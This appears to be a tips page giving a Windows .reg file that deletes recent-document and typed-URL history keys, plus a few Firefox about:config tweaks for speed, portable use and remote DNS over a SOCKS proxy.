Follow the given steps for configuration to clear recently opened documents automatically:
To edit the computer registry, first you should log onto your computer with administrative rights.
Here copy the following 6 lines and paste in notepad then save with the name Cleanmru.reg on your desktop.
REGEDIT4
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\
LastVisitedMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru]

When you double-click Cleanmru.reg icon to remove the windows history, a small dialog box will appear with the information "Are you sure you want to add the information in C:\Documents and Settings\Administrator\desktop\Clearmru.reg to the registry?"
At the end, you will get the message "Information in C:\Documents and Settings\Administrator\desktop\Clearmru.reg has been successfully entered into the registry." Click on Ok button and verify that your all history will have been clear.

Firefox tricks


Firefox tricks:-


1. faster loading

network.http.pipelining = true
network.http.proxy.pipeling = true
network.http.pipelining.maxrequest= 50 
nglayout.initialpaint.delay = 0

2. for USB or portable media 
browser.cache.disk.enable = false
browser.cache.memory.capacity = as much ram as you can ...

3. tunnel dns
To prevent Firefox from doing NS lookups enter {{about:config}} in the URL text field
and double click on the {{network.proxy.socks_remote_dns}} to set it to true.